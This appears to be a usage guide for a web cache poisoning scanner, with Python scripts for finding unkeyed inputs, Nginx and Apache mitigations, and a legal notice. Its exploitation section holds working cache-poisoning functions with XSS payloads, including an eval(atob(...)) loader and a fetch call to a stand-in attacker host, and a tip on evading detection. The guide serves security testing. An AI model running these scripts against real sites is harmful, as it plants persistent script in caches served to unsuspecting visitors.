Web Cache Vulnerability Scanner
Overview
Web Cache Vulnerability Scanner is a security testing tool designed to identify cache poisoning vulnerabilities in web applications. It analyzes HTTP caching mechanisms to detect inconsistencies in how cache keys are generated, unkeyed request inputs that influence responses, and cache behavior anomalies. It is intended for testing content delivery networks (CDNs), web servers, and proxy caches.
Installation
From Source
# Install from source
git clone https://github.com/PortSwigger/research.git
cd research/web-cache-poc
# Python installation
pip install -r requirements.txt
Manual Installation
# Download scanner
wget https://github.com/PortSwigger/research/raw/main/web-cache-poc/web-cache-scanner.py
# Install dependencies
pip install requests urllib3 colorama
Requirements
pip install "requests>=2.25.0"
pip install "urllib3>=1.26.0"
pip install "colorama>=0.4.4"
# argparse ships with the Python standard library; no separate install is needed
Core Concepts
Cache Key Components
Cache Key = Host + URL Path + Query String (sometimes)
Example:
- Keyed: Host, Path, Query parameters
- Unkeyed: Headers, Cookies, JSON body
- Partially keyed: Some parameters ignored
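The keyed/unkeyed split can be illustrated with a minimal sketch of how a cache might derive its key. The function name `build_cache_key` and the `ignored_params` argument are assumptions made for illustration; real caches differ in which components they include.

```python
from urllib.parse import urlsplit, parse_qsl, urlencode

def build_cache_key(url, headers=None, ignored_params=frozenset()):
    """Hypothetical cache key: host + path + query minus ignored parameters.

    Headers are accepted but deliberately never read, which is exactly
    what makes them unkeyed in this sketch.
    """
    parts = urlsplit(url)
    # Drop parameters the cache is configured to ignore (partially keyed query)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k not in ignored_params]
    # Sort so that parameter order does not change the key
    query = urlencode(sorted(kept))
    return f"{parts.netloc.lower()}|{parts.path or '/'}|{query}"

key_plain = build_cache_key("https://example.com/page?a=1")
key_with_header = build_cache_key(
    "https://example.com/page?a=1",
    headers={"X-Forwarded-Host": "attacker.example"},
)
print(key_plain == key_with_header)
```

Two requests that differ only in an unkeyed header produce the same key, so they share one cached response.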
Cache Poisoning Attack Vector
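1. Attacker sends a request containing a malicious unkeyed input
2. Origin reflects the input, and the cache stores the poisoned response
3. Victim requests the same resource and receives the poisoned cached response
4. Attack succeeds only if the victim's request maps to the same cache key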
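The steps above can be simulated offline with a toy in-memory cache. `ToyCache` and `origin` are hypothetical stand-ins, assuming a cache keyed only on host and path and an origin that reflects `X-Forwarded-Host`.

```python
class ToyCache:
    """In-memory cache keyed only on (host, path); headers are unkeyed."""

    def __init__(self, origin):
        self.origin = origin
        self.store = {}

    def get(self, host, path, headers=None):
        key = (host, path)
        if key not in self.store:
            # Cache miss: forward the full request and store the response
            self.store[key] = self.origin(host, path, headers or {})
        return self.store[key]

def origin(host, path, headers):
    """Hypothetical origin that reflects X-Forwarded-Host into a script URL."""
    asset_host = headers.get("X-Forwarded-Host", host)
    return f'<script src="https://{asset_host}/app.js"></script>'

cache = ToyCache(origin)
# Steps 1-2: attacker request with unkeyed input; response is stored
attacker_view = cache.get("example.com", "/", {"X-Forwarded-Host": "attacker.example"})
# Steps 3-4: victim sends a clean request that maps to the same key
victim_view = cache.get("example.com", "/")
print(victim_view)
```

The victim never sends the malicious header, yet receives the response generated for the attacker's request.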
Basic Usage
Scan Single Target
# Basic scan
python web-cache-scanner.py -u https://example.com
# Verbose output
python web-cache-scanner.py -u https://example.com -v
# Save results
python web-cache-scanner.py -u https://example.com -o report.txt
Common Options
| Option | Description |
|---|---|
| -u, --url | Target URL to scan |
| -v, --verbose | Verbose output |
| -o, --output | Save report to file |
| -t, --timeout | Request timeout (seconds) |
| -p, --port | Custom port |
| -H, --header | Add custom header |
| -c, --cookies | Add cookies |
| --proxy | Use HTTP proxy |
Cache Detection
Identify Caching Headers
# Check for cache headers
python -c "
import requests
response = requests.get('https://example.com')
print('Cache-Control:', response.headers.get('Cache-Control'))
print('ETag:', response.headers.get('ETag'))
print('Last-Modified:', response.headers.get('Last-Modified'))
print('Expires:', response.headers.get('Expires'))
print('Age:', response.headers.get('Age'))
"
Manual Header Inspection Script
import requests

def check_cache_headers(url):
    headers = {
        'User-Agent': 'Mozilla/5.0'
    }
    response = requests.get(url, headers=headers)
    cache_indicators = {
        'Cache-Control': response.headers.get('Cache-Control'),
        'ETag': response.headers.get('ETag'),
        'Last-Modified': response.headers.get('Last-Modified'),
        'Expires': response.headers.get('Expires'),
        'Age': response.headers.get('Age'),
        'Server': response.headers.get('Server'),
        'X-Cache': response.headers.get('X-Cache'),
    }
    for header, value in cache_indicators.items():
        if value:
            print(f"{header}: {value}")

check_cache_headers('https://example.com')
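Printing the headers still leaves the interpretation to the reader. A rough way to summarize them is sketched below; `summarize_cache_headers` is a hypothetical helper, and the `X-Cache` check assumes the common but non-standard convention of a value containing "HIT".

```python
def summarize_cache_headers(headers):
    """Return a rough cacheability summary from a mapping of response headers."""
    h = {k.lower(): v for k, v in headers.items()}
    directives = [d.strip().lower()
                  for d in h.get("cache-control", "").split(",") if d.strip()]
    x_cache = h.get("x-cache", "").lower()
    age = h.get("age")
    # A positive Age means the response spent time in a cache
    aged = age is not None and age.strip().isdigit() and int(age) > 0
    return {
        # no-store forbids caching; private forbids storage by shared caches
        "not_shared_cacheable": any(d in ("no-store", "private") for d in directives),
        "served_from_cache": ("hit" in x_cache) or aged,
        # Request headers that form part of the cache key via Vary
        "vary": [v.strip() for v in h.get("vary", "").split(",") if v.strip()],
    }

summary = summarize_cache_headers({
    "Cache-Control": "public, max-age=600",
    "Age": "42",
    "X-Cache": "HIT",
    "Vary": "Accept-Encoding",
})
print(summary)
```

The function accepts any mapping, so `response.headers` from `requests` can be passed directly.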
Vulnerability Detection
Unkeyed Input Detection
# Test for unkeyed headers
python web-cache-scanner.py -u https://example.com --test-headers
# Test for unkeyed query parameters
python web-cache-scanner.py -u https://example.com --test-params
# Test for unkeyed JSON fields
python web-cache-scanner.py -u https://example.com --test-json
Cache Key Consistency Testing
import requests
import hashlib

def test_cache_consistency(url, name, values, as_header=False):
    """Check whether changing a query parameter (or header) changes the response"""
    results = {}
    for value in values:
        # Send the value as a request header or as a query parameter
        if as_header:
            response = requests.get(url, headers={name: value}, timeout=10)
        else:
            response = requests.get(url, params={name: value}, timeout=10)
        # Get cache identifiers
        etag = response.headers.get('ETag')
        age = response.headers.get('Age')
        content_hash = hashlib.md5(response.content).hexdigest()
        results[value] = {
            'etag': etag,
            'age': age,
            'hash': content_hash
        }
    # Analyze consistency
    hashes = [r['hash'] for r in results.values()]
    if len(set(hashes)) == 1:
        print(f"[!] {name} may be UNKEYED or ignored - all responses identical")
    else:
        print(f"[+] {name} changes the response - likely keyed or reflected")
    return results

# Test X-Forwarded-For header (sent as a header, not as a query parameter)
test_cache_consistency(
    'https://example.com/page',
    'X-Forwarded-For',
    ['1.1.1.1', '2.2.2.2', '3.3.3.3'],
    as_header=True
)
Header-Based Poisoning
import requests

def test_header_injection(url, header_name, injection_values):
    """Test if a header value is reflected in the response"""
    base_response = requests.get(url, timeout=10)
    base_content = base_response.text
    for injection in injection_values:
        headers = {
            header_name: injection,
            'User-Agent': 'Mozilla/5.0'
        }
        response = requests.get(url, headers=headers, timeout=10)
        # Reflection alone shows a poisoning candidate; caching must be confirmed separately
        if injection in response.text and injection not in base_content:
            print(f"[!] CANDIDATE: {header_name} value reflected in response")
            return True
    return False

# Test common injection headers
vulnerable = test_header_injection(
    'https://example.com',
    'X-Forwarded-Host',
    ['attacker.com', 'evil.example.com']
)
Exploitation Techniques
Cache Poisoning with Unkeyed Headers
import requests
import time

def poison_cache_with_header(target_url, header_name, payload):
    """Attempt cache poisoning via unkeyed header"""
    # Inject payload
    headers = {
        header_name: payload
    }
    requests.get(target_url, headers=headers, timeout=10)
    print("[*] Injection request sent")
    # Verify poisoning with a clean request (from a different IP if possible)
    time.sleep(2)
    clean_response = requests.get(target_url, timeout=10)
    if payload in clean_response.text:
        print(f"[!] POISONED: {header_name} injection persisted in cache")
        return True
    else:
        print("[-] Not poisoned - header filtered or keyed")
        return False

# Attempt poisoning
poison_cache_with_header(
    'https://example.com/page',
    'X-Forwarded-For',
    '<img src=x onerror="alert(\'xss\')">'
)
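A poisoning test against a live URL can serve the payload to real visitors. A common precaution is to add a unique query parameter (a cache buster) so the test works on a cache entry only the tester will hit. The sketch below assumes the query string is part of the cache key; `with_cache_buster` and the `cb` parameter name are illustrative choices.

```python
import uuid
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

def with_cache_buster(url, param="cb", token=None):
    """Return url with a unique query parameter appended."""
    # A random token gives each test run its own cache entry
    token = token or uuid.uuid4().hex
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append((param, token))
    return urlunsplit(parts._replace(query=urlencode(query)))

# Reuse the same busted URL for both the injection and the verification request
test_url = with_cache_buster("https://example.com/page?a=1", token="abc123")
print(test_url)
```

Both the injection request and the clean verification request must use the same busted URL; otherwise they map to different cache entries and the check proves nothing.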
JavaScript Injection via Cache
import requests

def xss_cache_poison(target_url):
    """Inject XSS payload via cache poisoning"""
    payloads = [
        '<img src=x onerror="eval(atob(\'BASE64_PAYLOAD\'))">',
        '<svg/onload="fetch(\'http://attacker.com\')">',
        '<iframe src="javascript:alert(document.domain)">',
    ]
    for payload in payloads:
        headers = {
            'User-Agent': payload
        }
        try:
            response = requests.get(target_url, headers=headers, timeout=5)
            if payload in response.text:
                print(f"[!] XSS payload reflected: {payload[:50]}")
                return True
        except requests.RequestException:
            # Network error or timeout: move on to the next payload
            continue
    return False

xss_cache_poison('https://example.com')
Scanner Operation
Full Site Scan
# Comprehensive vulnerability scan
python web-cache-scanner.py \
-u https://example.com \
--scan-all \
-v \
-o full_report.html
Targeted Scanning
# Scan specific endpoint
python web-cache-scanner.py \
-u https://example.com/api/endpoint \
--test-headers \
--test-params
# Scan with authentication
python web-cache-scanner.py \
-u https://example.com \
-H "Authorization: Bearer token" \
-v
Custom Header Testing
# Test specific headers for poisoning
python web-cache-scanner.py \
-u https://example.com \
--headers "X-Forwarded-For,X-Forwarded-Host,X-Original-Url"
Custom Scripts
Batch URL Testing
import requests
from urllib.parse import urljoin

def scan_urls_batch(base_url, endpoint_list):
    """Test multiple endpoints for cache vulnerabilities"""
    vulnerable = []
    for endpoint in endpoint_list:
        full_url = urljoin(base_url, endpoint)
        # Get baseline response
        baseline = requests.get(full_url)
        baseline_headers = baseline.headers
        # Check for cache headers
        is_cached = any([
            baseline_headers.get('Cache-Control'),
            baseline_headers.get('ETag'),
            baseline_headers.get('Age'),
        ])
        if is_cached:
            print(f"[*] {endpoint} - Cached")
            # Test for unkeyed inputs
            headers = {'X-Test': 'injection'}
            response = requests.get(full_url, headers=headers)
            if 'injection' in response.text:
                vulnerable.append(endpoint)
                print("  [!] Possible XSS/Injection vector")
    return vulnerable

endpoints = ['/index.html', '/about', '/api/data', '/search']
results = scan_urls_batch('https://example.com', endpoints)
print(f"\nVulnerable endpoints: {results}")
Cache Key Analysis
import requests
import hashlib

def analyze_cache_key(url, test_params):
    """Determine what factors affect cache key"""
    results = {}
    for param_name, param_values in test_params.items():
        responses = []
        for value in param_values:
            r = requests.get(url, params={param_name: value})
            response_hash = hashlib.sha256(r.content).hexdigest()
            responses.append(response_hash)
        # Check if all responses identical (unkeyed)
        unique = len(set(responses))
        results[param_name] = {
            'variations': len(param_values),
            'unique_responses': unique,
            'keyed': unique > 1
        }
    print("\n=== Cache Key Analysis ===")
    for param, data in results.items():
        status = "KEYED" if data['keyed'] else "UNKEYED (Vulnerable)"
        print(f"{param}: {status}")
    return results

test_params = {
    'utm_source': ['google', 'facebook', 'twitter'],
    'utm_campaign': ['sale', 'promo'],
    'cache_bust': ['1', '2', '3'],
}
analyze_cache_key('https://example.com', test_params)
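Hash comparison can mislead when a page embeds timestamps or per-request tokens, because every response then differs regardless of the parameter. One way to guard against this, sketched here under the assumption that the same URL is fetched several times unchanged first, is to classify a parameter only when the baseline is stable. `classify_parameter` is a hypothetical helper that works on already collected response bodies.

```python
import hashlib

def classify_parameter(baseline_bodies, varied_bodies):
    """Classify a parameter from response bodies (bytes).

    baseline_bodies: bodies from repeated, identical requests.
    varied_bodies:   bodies from requests where only the parameter value changed.
    """
    def digest(body):
        return hashlib.sha256(body).hexdigest()

    if len({digest(b) for b in baseline_bodies}) > 1:
        # The page changes on its own, so differing hashes prove nothing
        return "inconclusive"
    if len({digest(b) for b in varied_bodies}) > 1:
        return "affects-response"
    return "no-observable-effect"

print(classify_parameter([b"page", b"page"], [b"page", b"page"]))
print(classify_parameter([b"page", b"page"], [b"page a", b"page b"]))
print(classify_parameter([b"t=1", b"t=2"], [b"t=3", b"t=4"]))
```

A "no-observable-effect" result still needs a follow-up check of the cache behavior itself, since an ignored parameter and an unkeyed one look the same at this level.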
Report Analysis
Generated Reports
# HTML report
python web-cache-scanner.py -u https://example.com -o report.html
# JSON report
python web-cache-scanner.py -u https://example.com --format json -o report.json
# Text report
python web-cache-scanner.py -u https://example.com --format text -o report.txt
Report Interpretation
Reports typically include:
- Cache header analysis
- Identified unkeyed inputs
- Vulnerability severity ratings
- Proof-of-concept demonstrations
- Remediation recommendations
Mitigation Strategies
Secure Cache Configuration
# Apache cache headers
Header set Cache-Control "private, max-age=3600"
Header set Vary "Accept-Encoding, Authorization"
# Include all relevant cache key factors
Header set Vary "Host, Accept-Encoding, Accept-Language"
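The effect of `Vary` is that the listed request headers become part of the cache key. A minimal sketch of that secondary key follows; `secondary_key` is a hypothetical helper, and real caches also normalize header values, which this sketch skips.

```python
def secondary_key(vary_header, request_headers):
    """Build the secondary cache key implied by a response's Vary header."""
    req = {k.lower(): v for k, v in request_headers.items()}
    names = sorted(n.strip().lower() for n in vary_header.split(",") if n.strip())
    if "*" in names:
        # Vary: * means a stored response never matches a later request
        return None
    # Only headers named in Vary contribute; everything else stays unkeyed
    return tuple((n, req.get(n, "")) for n in names)

clean = secondary_key(
    "Accept-Encoding, Accept-Language",
    {"Accept-Encoding": "gzip", "Accept-Language": "en"},
)
with_extra = secondary_key(
    "Accept-Encoding, Accept-Language",
    {"Accept-Encoding": "gzip", "Accept-Language": "en",
     "X-Forwarded-Host": "attacker.example"},
)
print(clean == with_extra)
```

A header that influences the response but is missing from `Vary` (here `X-Forwarded-Host`) does not change the key, which is the condition poisoning relies on.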
Nginx Configuration
# Nginx caching best practices
proxy_cache_key "$scheme$request_method$host$request_uri$http_authorization";
proxy_cache_bypass $http_authorization;
add_header Vary "Accept-Encoding, Authorization, Accept";
CDN Best Practices
# Exclude sensitive inputs from cache
Cache-Key: $HOST$REQUEST_URI
Cache-Bypass: Cookie, Authorization
Surrogate-Key: content-v1
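The bypass rule above can be expressed as a small decision function. This is a sketch of the logic only, not any CDN's configuration language; `should_bypass_cache` and `BYPASS_HEADERS` are illustrative names.

```python
BYPASS_HEADERS = ("cookie", "authorization")

def should_bypass_cache(request_headers, bypass_headers=BYPASS_HEADERS):
    """Return True when the request carries a header that should skip the cache."""
    # Header names are case-insensitive; empty values count as absent
    present = {k.lower() for k, v in request_headers.items() if v}
    return any(name in present for name in bypass_headers)

print(should_bypass_cache({"Authorization": "Bearer token"}))
print(should_bypass_cache({"Accept": "text/html"}))
```

Requests with credentials go straight to the origin, so personalized responses are never stored under a shared key.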
Advanced Topics
Polyglot Cache Poisoning
import requests

def polyglot_poison_attempt(url):
    """Test polyglot attacks affecting multiple content types"""
    payloads = {
        'css_injection': '<style>body{display:none}</style>',
        'html_injection': '<script>alert("xss")</script>',
        'json_injection': '{"payload": "injection"}',
    }
    for attack_type, payload in payloads.items():
        headers = {
            'Content-Type': 'application/json',
            'X-Payload': payload
        }
        response = requests.get(url, headers=headers, timeout=10)
        print(f"[*] {attack_type}: {len(response.content)} bytes")
Cache Coherency Testing
import time
import requests

def test_cache_coherency(url):
    """Verify cache invalidation mechanisms"""
    # Get initial response
    r1 = requests.get(url, timeout=10)
    etag1 = r1.headers.get('ETag')
    if etag1 is None:
        print("[-] No ETag returned - cannot test conditional requests")
        return
    time.sleep(2)
    # Revalidate: an unchanged resource should answer 304 Not Modified
    headers = {'If-None-Match': etag1}
    r2 = requests.get(url, headers=headers, timeout=10)
    if r2.status_code == 304:
        print("[*] Cache validation working (304 Not Modified)")
    elif r2.status_code == 200:
        etag2 = r2.headers.get('ETag')
        if etag1 != etag2:
            print("[!] ETags differ - cache coherency issue")
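When comparing ETags by hand, note that `If-None-Match` uses weak comparison: a `W/` prefix is ignored and only the quoted opaque tag must match. The sketch below shows that decision offline. `if_none_match_status` is a hypothetical helper, and splitting on commas is a simplification that assumes no commas inside the quoted tags.

```python
def _opaque(tag):
    """Strip surrounding whitespace and the weak-validator prefix."""
    tag = tag.strip()
    return tag[2:] if tag.startswith("W/") else tag

def if_none_match_status(if_none_match, current_etag):
    """Return 304 if the client's validator matches the current ETag, else 200."""
    if current_etag is None or not if_none_match:
        return 200
    if if_none_match.strip() == "*":
        # "*" matches any current representation
        return 304
    candidates = {_opaque(t) for t in if_none_match.split(",")}
    return 304 if _opaque(current_etag) in candidates else 200

print(if_none_match_status('W/"abc"', '"abc"'))
print(if_none_match_status('"old"', '"abc"'))
```

A plain string comparison of two ETag headers can therefore report a difference where the server would still answer 304.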
Troubleshooting
No Vulnerabilities Found
# Increase verbosity for debugging
python web-cache-scanner.py -u https://example.com -vv
# Skip certificate verification (for example, when traffic passes through an intercepting proxy)
python web-cache-scanner.py -u https://example.com --ssl-verify=false
# Custom timeout
python web-cache-scanner.py -u https://example.com -t 30
SSL/TLS Issues
# Disable SSL verification (testing only)
python web-cache-scanner.py -u https://example.com --ssl-verify=false
# Use custom certificate
python web-cache-scanner.py -u https://example.com --cert=/path/to/cert.pem
Performance Tips
- Adjust request delays to avoid detection
- Use threading for large scans
- Cache results to avoid redundant requests
- Test during low-traffic periods
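The first three tips can be combined in one small wrapper: a thread pool for concurrency, a minimum delay between request starts, and reuse of completed results. This is a sketch under stated assumptions; `ThrottledFetcher` and `scan_all` are hypothetical names, and `fetch` stands for any callable that takes a URL (for example a thin wrapper around `requests.get`).

```python
import threading
import time
from concurrent.futures import ThreadPoolExecutor

class ThrottledFetcher:
    """Wrap a fetch callable with a minimum delay between calls and a result cache."""

    def __init__(self, fetch, min_delay=0.5):
        self.fetch = fetch
        self.min_delay = min_delay
        self._lock = threading.Lock()
        self._last = float("-inf")  # no request sent yet
        self._results = {}

    def get(self, url):
        with self._lock:
            # Reuse a completed result instead of sending a redundant request
            if url in self._results:
                return self._results[url]
            # Space out request starts; sleeping under the lock serializes them
            wait = self._last + self.min_delay - time.monotonic()
            if wait > 0:
                time.sleep(wait)
            self._last = time.monotonic()
        result = self.fetch(url)
        with self._lock:
            self._results.setdefault(url, result)
            return self._results[url]

def scan_all(urls, fetch, workers=4, min_delay=0.5):
    """Fetch every URL through one shared throttled fetcher; returns {url: result}."""
    fetcher = ThrottledFetcher(fetch, min_delay)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(zip(urls, pool.map(fetcher.get, urls)))

# Usage with a stub fetch function standing in for a real HTTP call
results = scan_all(["/a", "/b"], lambda url: url.upper(), workers=2, min_delay=0.01)
print(results)
```

Only completed results are reused, so two identical URLs that are in flight at the same time may both be fetched.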
Comparison with Similar Tools
| Tool | Purpose | Approach |
|---|---|---|
| Web Cache Scanner | Cache poisoning | Manual header/param testing |
| Burp Suite | Full web testing | Integrated caching analysis |
| Zaproxy | OWASP scanning | Cache detection plugin |
| Responder | LLMNR/NBT-NS/mDNS poisoning | Network name-resolution spoofing; does not analyze HTTP caches |
Related Security Concepts
- HTTP Response Splitting
- Request Smuggling
- CDN Security
- Web Application Firewalls
References
- PortSwigger: Web Cache Poisoning
- RFC 9111: HTTP Caching (obsoletes RFC 7234)
- OWASP: Cache Poisoning
- HTTP Smuggling Research
Legal Notice
Use only on authorized systems. Unauthorized testing is illegal. Obtain written permission before scanning production systems.